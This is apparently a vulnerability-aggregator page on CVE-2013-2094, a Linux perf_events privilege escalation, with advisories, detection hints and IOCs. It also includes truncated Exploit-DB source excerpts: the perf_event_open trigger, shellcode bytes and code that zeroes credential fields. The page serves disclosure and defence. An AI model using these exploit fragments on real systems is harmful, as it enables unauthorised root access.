CVE-2013-2094
published 2013-05-14CVE-2013-2094: The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain…
PriorityP186high8.4CVSS 3.1
AVLACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-10-06
Exploited in the wild
EPSS
47.71%
98.7th percentile
The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | < linux 3.8.11-1 (bookworm) | linux 3.8.11-1 (bookworm) |
| linux | linux_kernel | < 3.0.75 | 3.0.75 |
| linux | linux_kernel | >= 0 < 3.8.11-1 | 3.8.11-1 |
| linux | linux_kernel | >= 0 < 3.8.11-1 | 3.8.11-1 |
| linux | linux_kernel | >= 0 < 3.8.11-1 | 3.8.11-1 |
| linux | linux_kernel | >= 0 < 3.8.11-1 | 3.8.11-1 |
| linux | linux_kernel | >= 3.1 < 3.2.45 | 3.2.45 |
| linux | linux_kernel | >= 3.3 < 3.4.42 | 3.4.42 |
| linux | linux_kernel | >= 3.5 < 3.8.9 | 3.8.9 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
0f 01 f8 e8 05 00 00 00 0f 01 f8 48 cf
- →Detect exploitation of CVE-2013-2094 by monitoring for perf_event_open syscall (syscall number 298 on x86_64) invocations with a large/negative config offset value (e.g., 0xFFFFFFFFL or -1/-2) from unprivileged processes, which is the trigger mechanism used in public exploits. ↗
- →Monitor for mmap calls mapping executable memory at low kernel-adjacent addresses (e.g., 0x380000000, 0x1780000000) combined with perf_event_open syscall activity — a pattern consistent with CVE-2013-2094 exploit staging. ↗
- →The Skygofree exploit payload targets the perf_swevent_init vulnerability (CVE-2013-2094) alongside other CVEs; look for exploit ELF files named 'run_root_shell', 'arrs_put_user.o', 'arrs_put_user', or 'poc' dropped on Android devices. ↗
- →The CVE-2013-2094 exploit uses the IDT (Interrupt Descriptor Table) address to calculate the malicious perf_event_open offset; detection systems can look for SIDT instruction execution in user-space processes as a precursor indicator. ↗
- →The exploit achieves privilege escalation by zeroing credential fields in the kernel task_struct; monitor for unexpected UID/GID transitions to 0 (root) immediately following perf_event_open syscall activity. ↗
- →CVE-2013-2094 is exploitable via the perf_event_open system call on Linux kernels before 3.8.9; systems running affected kernel versions with perf_event_open accessible to unprivileged users are at risk. ↗
- ·The exploit payload targets specific kernel symbol addresses (perf_swevent_enabled, commit_creds, prepare_kernel_cred) that are hardcoded per Ubuntu kernel version; the offsets differ across targets and the exploit requires a target index to select the correct addresses. ↗
- ·The exploit behavior differs depending on whether CONFIG_JUMP_LABEL is set in the kernel build; the exploit auto-detects this and adjusts the element size (sz=4 vs sz=24) and base address accordingly. ↗
CVSS provenance
nvdv3.18.4HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv8.4HIGH
vulncheck8.4HIGH
cisa8.4HIGH
vendor_debian8.4HIGH
vendor_redhat8.4HIGH
vendor_ubuntu8.4HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Linux Kernel Privilege Escalation Vulnerability
cisa·2022-09-15·CVSS 8.4
CVE-2013-2094 [HIGH] CWE-189 Linux Kernel Privilege Escalation Vulnerability
Vulnerability: Linux Kernel Privilege Escalation Vulnerability
Affected: Linux Kernel
Linux kernel fails to check all 64 bits of attr.config passed by user space, resulting to out-of-bounds access of the perf_swevent_enabled array in sw_perf_event_destroy(). Explotation allows for privilege escalation.
Required Action: Apply updates per vendor instructions.
Notes: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8176cced706b5e5d15887584150764894e94e02f; https://nvd.nist.gov/vuln/detail/CVE-2013-2094
Remediation Due Date: 2022-10-06
Ubuntu
Linux kernel (Raring HWE) vulnerability
vendor_ubuntu·2013-05-31·CVSS 8.4
CVE-2013-2094 [HIGH] Linux kernel (Raring HWE) vulnerability
Title: Linux kernel (Raring HWE) vulnerability
Summary: Several security issues were fixed in the kernel.
Kees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. A remote
unauthenticated attacker could exploit this flaw to cause a denial of
service (system crash) or potentially gain administrative privileges.
(CVE-2013-2850)
An flaw was discovered in the Linux kernel's perf_events interface. A local
user could exploit this flaw to escalate privileges on the system.
(CVE-2013-2094)
An information leak was discovered in the Linux kernel's tkill and tgkill
system calls when used from compat processes. A local user could exploit
this flaw to examine potentially sensitive kernel memory. (CVE-2013-2141)
A flaw was discovered in the Linux kernel's perf events subsystem for Intel
S
Ubuntu
Linux kernel (OMAP4) vulnerabilities
vendor_ubuntu·2013-05-30·CVSS 4.4
CVE-2013-1929 [MEDIUM] Linux kernel (OMAP4) vulnerabilities
Title: Linux kernel (OMAP4) vulnerabilities
Summary: Several security issues were fixed in the kernel.
An flaw was discovered in the Linux kernel's perf_events interface. A local
user could exploit this flaw to escalate privileges on the system.
(CVE-2013-2094)
A buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet
driver for the Linux kernel. A local user could exploit this flaw to cause
a denial of service (crash the system) or potentially escalate privileges
on the system. (CVE-2013-1929)
A flaw was discovered in the Linux kernel's ftrace subsystem interface. A
local user could exploit this flaw to cause a denial of service (system
crash). (CVE-2013-3301)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary cha
Ubuntu
Linux kernel (OMAP4) vulnerabilities
vendor_ubuntu·2013-05-28·CVSS 4.4
CVE-2013-1929 [MEDIUM] Linux kernel (OMAP4) vulnerabilities
Title: Linux kernel (OMAP4) vulnerabilities
Summary: Several security issues were fixed in the kernel.
An flaw was discovered in the Linux kernel's perf_events interface. A local
user could exploit this flaw to escalate privileges on the system.
(CVE-2013-2094)
Andy Lutomirski discover an error in the Linux kernel's credential handling
on unix sockets. A local user could exploit this flaw to gain
administrative privileges. (CVE-2013-1979)
A buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet
driver for the Linux kernel. A local user could exploit this flaw to cause
a denial of service (crash the system) or potentially escalate privileges
on the system. (CVE-2013-1929)
An information leak was discovered in the Linux kernel's tkill and tgkill
system calls when used
Ubuntu
Linux kernel (Quantal HWE) vulnerability
vendor_ubuntu·2013-05-16
CVE-2013-2094 Linux kernel (Quantal HWE) vulnerability
Title: Linux kernel (Quantal HWE) vulnerability
Summary: The system could be made to run programs as an administrator.
An flaw was discovered in the Linux kernel's perf_events interface. A local
user could exploit this flaw to escalate privileges on the system.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. If
you use linux-restricted-modules, you have to update that package as
well to get modules which work with the new kernel version. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
Ubuntu
Linux kernel vulnerability
vendor_ubuntu·2013-05-16
CVE-2013-2094 Linux kernel vulnerability
Title: Linux kernel vulnerability
Summary: The system could be made to run programs as an administrator.
An flaw was discovered in the Linux kernel's perf_events interface. A local
user could exploit this flaw to escalate privileges on the system.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. If
you use linux-restricted-modules, you have to update that package as
well to get modules which work with the new kernel version. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server,
Red Hat
kernel: perf_swevent_enabled array out-of-bound access
vendor_redhat·2013-05-14·CVSS 8.4
CVE-2013-2094 [HIGH] CWE-1285 kernel: perf_swevent_enabled array out-of-bound access
kernel: perf_swevent_enabled array out-of-bound access
The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.
Statement: This issue does not affect the kernel packages as shipped with Red Hat Enterprise Linux 5 because we did not backport upstream commit b0a873eb that introduced this issue.
This issue was addressed in Red Hat Enterprise Linux 6 via RHSA-2013:0830 (https://rhn.redhat.com/errata/RHSA-2013-0830.html), Red Hat Enterprise Linux 6.1 Extended update support via RHSA-2013:0841 (https://rhn.redhat.com/errata/RHSA-2013-0841.html), Red Hat Enterprise Linux 6.2 Extended update support via RHSA-2013:0840 (https://rhn.redhat.com/e
Debian
CVE-2013-2094: linux - The perf_swevent_init function in kernel/events/core.c in the Linux kernel befor...
vendor_debian·2013·CVSS 8.4
CVE-2013-2094 [HIGH] CVE-2013-2094: linux - The perf_swevent_init function in kernel/events/core.c in the Linux kernel befor...
The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.
Scope: local
bookworm: resolved (fixed in 3.8.11-1)
bullseye: resolved (fixed in 3.8.11-1)
forky: resolved (fixed in 3.8.11-1)
sid: resolved (fixed in 3.8.11-1)
trixie: resolved (fixed in 3.8.11-1)
GHSA
GHSA-xpgm-72rm-72p4: The perf_swevent_init function in kernel/events/core
ghsa_unreviewed·2022-05-17
CVE-2013-2094 [HIGH] GHSA-xpgm-72rm-72p4: The perf_swevent_init function in kernel/events/core
The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.
OSV
CVE-2013-2094: The perf_swevent_init function in kernel/events/core
osv·2013-05-14·CVSS 8.4
CVE-2013-2094 [HIGH] CVE-2013-2094: The perf_swevent_init function in kernel/events/core
The perf_swevent_init function in kernel/events/core.c in the Linux kernel before 3.8.9 uses an incorrect integer data type, which allows local users to gain privileges via a crafted perf_event_open system call.
VulnCheck
Linux Kernel Privilege Escalation Vulnerability
vulncheck·2013·CVSS 8.4
CVE-2013-2094 [HIGH] CWE-189 Linux Kernel Privilege Escalation Vulnerability
Linux Kernel Privilege Escalation Vulnerability
Linux kernel fails to check all 64 bits of attr.config passed by user space, resulting to out-of-bounds access of the perf_swevent_enabled array in sw_perf_event_destroy(). Explotation allows for privilege escalation.
Affected: Linux Kernel
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.linuxglobal.com/cve-2013-2094-root-privilege-escalation-attack/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/553d40d9c74c; https://vulncheck.com/xdb/9dbfce6b00bc; https://vulncheck.com/xdb/1590c8e66264; https://vulncheck.com/xdb/7ffd21fa0ec4; https://vulncheck.com/xdb/1b5a2f6d40ca
Remediation Due: 2022-10-06
No detection rules found.
Exploit-DB
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)
exploitdb·2014-05-31
CVE-2013-2094 Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)
---
/**
* Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit
* by Vitaly Nikolenko ([email protected])
*
* based on semtex.c by sd
*
* Supported targets:
* [0] Ubuntu 12.04.0 - 3.2.0-23-generic
* [1] Ubuntu 12.04.1 - 3.2.0-29-generic
* [2] Ubuntu 12.04.2 - 3.5.0-23-generic
*
* $ gcc vnik.c -O2 -o vnik
*
* $ uname -r
* 3.2.0-23-generic
*
* $ ./vnik 0
*/
#define _GNU_SOURCE 1
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BASE 0x1780000000
#define SIZE 0x0010000000
#define KSIZE 0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(
Exploit-DB
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)
exploitdb·2013-06-11·CVSS 8.4
CVE-2013-2094 [HIGH] Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)
Linux Kernel
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BASE 0x380000000
#define BASE_JUMP 0x1780000000
#define SIZE 0x10000000
#define KSIZE 0x2000000
#define TMP(x) (0xdeadbeef + (x))
struct idt {
uint16_t limit;
uint64_t addr;
} __attribute__((packed));
static int _fd;
static int perf_open(uint64_t off)
{
struct perf_event_attr attr;
int rc;
// printf("perf open %lx [%d]\n", off, (int) off);
memset(&attr, 0, sizeof(attr));
attr.type = PERF_TYPE_SOFTWARE;
attr.size = sizeof(attr);
attr.config = off;
attr.mmap = 1;
attr.comm = 1;
attr.exclude_kernel = 1;
rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
return rc;
}
void __sc_start(void);
void __sc_next(void);
void __sc(void)
{
asm("__sc_start:\n"
"call __sc_next\n"
"iretq\n"
Exploit-DB
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)
exploitdb·2013-05-14
CVE-2013-2094 Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)
Linux Kernel 2.6.32
#include
#include
#include
#include
#include
#include
#include
#include
#define BASE 0x380000000
#define SIZE 0x010000000
#define KSIZE 0x2000000
#define AB(x) ((uint64_t)((0xababababLL>36;
uint32_t *fixptr = (void*) AB(1);
*fixptr = -1;
for (i=0; i>36) != kbase)) continue;
for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
if (((uint32_t*)uids)[k] != t[j+k]) goto next;
for (i = 0; i < 8; i++) t[j+i] = 0;
for (i = 0; i < 10; i++) t[j+9+i] = -1;
return;
next:; }
}
}
void sheep(uint32_t off) {
uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
int fd = syscall(298, buf, 0, -1, -1, 0);
assert(!close(fd));
}
int main() {
uint64_t u,g,needle, kbase, *p; uint8_t *code;
uint32_t *map, j = 5;
int i;
struct {
uint16_t limit;
uint64_t addr;
} __attribute__((packed)) idt;
asser
Securelist
Skygofree: Following in the footsteps of HackingTeam
blogs_securelist·2018-01-16
Skygofree: Following in the footsteps of HackingTeam
Table of Contents
Malware Features
Android
Reverse shell payload
Exploit payload
Busybox payload
Social payload
Parser payload
Windows
Code similarities
Distribution
Artifacts
Conclusions
Notes
Authors
Nikita Buchka
Alexey Firsh
At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specif
Securelist
Skygofree: Following in the footsteps of HackingTeam
blogs_securelist·2018-01-16
Skygofree: Following in the footsteps of HackingTeam
Table of Contents
- Malware Features
- Distribution
- Artifacts
- Conclusions
Authors
- Nikita Buchka
- Alexey Firsh
At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to
Bugzilla
CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access [fedora-all]
bugzilla·2013-05-14·CVSS 8.4
CVE-2013-2094 [HIGH] CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access [fedora-all]
CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
Please note: this issue
Bugzilla
CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access
bugzilla·2013-05-14·CVSS 8.4
CVE-2013-2094 [HIGH] CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access
CVE-2013-2094 kernel: perf_swevent_enabled array out-of-bound access
A flaw was found in the way index into perf_swevent_enabled array was sanitized.
A local unprivileged user can use this flaw to increase their privileges on the system.
Introduced by:
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b0a873ebbf87bf38bf70b5e39a7cadc96099fa13
Upstream fix:
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8176cced706b5e5d15887584150764894e94e02f
References:
http://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03652.html
https://news.ycombinator.com/item?id=5703758
http://packetstormsecurity.com/files/121616/semtex.c
Discussion:
Created kernel tracking bugs for this issue
Affects: fedora-all [bug 962799]
---
Statement:
This issue do
arXiv
KASR: A Reliable and Practical Approach to Attack Surface Reduction of Commodity OS Kernels
arxiv_fulltext·2018-11-29
KASR: A Reliable and Practical Approach to Attack Surface Reduction of Commodity OS Kernels
[1]2pt#1.
KASR
[1]
[3]#3#1 says: #2
[1]zhi#1blue
: A Reliable and Practical Approach to Attack Surface Reduction of
Commodity OS Kernels
A Reliable and Practical Approach to Kernel Attack Surface Reduction
Zhi Zhang1,2( )
Yueqiang Cheng3
Surya Nepal1
Dongxi Liu1
Qingni Shen4
Fethi Rabhi2
Z. Zhang et al.
Data61, CSIRO, Australia
\zhi.zhang,surya.nepal,dongxi.liu\@data61.csiro.au
University of New South Wales, Sydney, Australia
[email protected], [email protected]
Baidu XLab, Sunnyvale, California, United States
[email protected]
Peking University, Beijing, China
[email protected]
empty
## Abstract
Commodity OS kernels have broad attack surfaces due to the large code base and the numerous features such as device drivers. For a real-world use case (e.g
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=8176cced706b5e5d15887584150764894e94e02fhttp://lists.centos.org/pipermail/centos-announce/2013-May/019729.htmlhttp://lists.centos.org/pipermail/centos-announce/2013-May/019733.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-05/msg00008.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-05/msg00018.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-06/msg00005.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-06/msg00009.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-06/msg00017.htmlhttp://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03652.htmlhttp://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03976.htmlhttp://lkml.indiana.edu/hypermail/linux/kernel/1304.1/04302.htmlhttp://news.ycombinator.com/item?id=5703758http://packetstormsecurity.com/files/121616/semtex.chttp://rhn.redhat.com/errata/RHSA-2013-0830.htmlhttp://twitter.com/djrbliss/statuses/334301992648331267http://www.exploit-db.com/exploits/33589http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.8.9http://www.mandriva.com/security/advisories?name=MDVSA-2013:176http://www.openwall.com/lists/oss-security/2013/05/14/6http://www.osvdb.org/93361http://www.reddit.com/r/netsec/comments/1eb9iwhttp://www.ubuntu.com/usn/USN-1825-1http://www.ubuntu.com/usn/USN-1826-1http://www.ubuntu.com/usn/USN-1827-1http://www.ubuntu.com/usn/USN-1828-1http://www.ubuntu.com/usn/USN-1836-1http://www.ubuntu.com/usn/USN-1838-1https://bugzilla.redhat.com/show_bug.cgi?id=962792https://github.com/torvalds/linux/commit/8176cced706b5e5d15887584150764894e94e02fhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=8176cced706b5e5d15887584150764894e94e02fhttp://lists.centos.org/pipermail/centos-announce/2013-May/019729.htmlhttp://lists.centos.org/pipermail/centos-announce/2013-May/019733.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-05/msg00008.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-05/msg00018.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-06/msg00005.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-06/msg00009.htmlhttp://lists.opensuse.org/opensuse-security-announce/2013-06/msg00017.htmlhttp://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03652.htmlhttp://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03976.htmlhttp://lkml.indiana.edu/hypermail/linux/kernel/1304.1/04302.htmlhttp://news.ycombinator.com/item?id=5703758http://packetstormsecurity.com/files/121616/semtex.chttp://rhn.redhat.com/errata/RHSA-2013-0830.htmlhttp://twitter.com/djrbliss/statuses/334301992648331267http://www.exploit-db.com/exploits/33589http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.8.9http://www.mandriva.com/security/advisories?name=MDVSA-2013:176http://www.openwall.com/lists/oss-security/2013/05/14/6http://www.osvdb.org/93361http://www.reddit.com/r/netsec/comments/1eb9iwhttp://www.ubuntu.com/usn/USN-1825-1http://www.ubuntu.com/usn/USN-1826-1http://www.ubuntu.com/usn/USN-1827-1http://www.ubuntu.com/usn/USN-1828-1http://www.ubuntu.com/usn/USN-1836-1http://www.ubuntu.com/usn/USN-1838-1https://bugzilla.redhat.com/show_bug.cgi?id=962792https://github.com/torvalds/linux/commit/8176cced706b5e5d15887584150764894e94e02fhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2013-2094
2013-05-14
Published
2022-09-15
Added to CISA KEV
Exploited in the wild